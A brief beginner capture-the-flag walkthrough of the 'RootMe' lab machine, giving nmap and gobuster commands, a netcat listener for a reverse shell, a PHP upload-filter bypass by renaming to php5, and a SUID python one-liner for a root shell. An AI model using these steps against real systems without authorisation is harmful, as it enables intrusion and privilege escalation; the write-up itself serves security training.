RootMe

Penetration Testing Methodology

Reconnaissance

• nmap

Enumeration

• Directory enumeration using gobuster

Exploitation *

Privilege Escalation

• /usr/bin/python

Capturing the flag

• user.txt

• root.txt

---

Walkthrough

nmap -sC -sV 10.10.231.227

image

From the nmap scanning. I found that 2 port open. Which is

• 22 (ssh)

• 80 (http)

I browse the given IP address.

image

But, there is nothing interesting. So, I decide to enumerate the directory. By using gobuster.

gobuster dir -u 10.10.231.227 -w /root/List/directory-list-2.3-medium.txt=

list all directory or file

image

Open the directory (http://10.10.231.227/p****/)

Seems like we can upload a file.

Upload reverseshell and run a listener

nc -nlvp 1234

image

Cannot upload php file. Lets try change to php5 or php4.

image

Okay success.

image

Click and we will get into system.

find / -name user.txt 2>/dev/null

Privilege Escalation

/usr/bin/python

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

CONGRATULATIONS!!

This was a fun machine. Very basic yet fun to root. Good for beginner.

Thank you for reading. :)

By AdaniKamal